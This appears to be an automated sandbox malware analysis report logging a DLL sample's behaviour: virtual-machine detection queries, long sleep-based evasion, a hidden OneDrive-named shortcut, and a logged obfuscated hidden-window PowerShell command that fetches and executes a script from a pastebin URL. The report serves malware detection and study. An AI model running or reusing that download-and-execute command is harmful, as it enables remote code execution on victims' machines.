Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590938Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590813Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590686Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590577Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4822Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4816Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6309
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1351Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7425Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2295Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3402
Source: C:\Windows\System32\loaddll64.exe TID: 4888Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -17524406870024063s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 6309 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 3243 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 5374 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep count: 4242 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1920Thread sleep count: 1351 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep count: 149 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep count: 189 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep count: 7425 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -26747778906878833s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep count: 2295 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590938s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590813s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590686s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590577s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep count: 847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep count: 164 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 200 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep count: 6319 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep count: 3402 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590938Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590813Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590686Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590577Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000D.00000002.1783891772.000002476F9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: powershell.exe, 00000014.00000002.2360276235.000002152C37F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2415473868.000001B76A150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
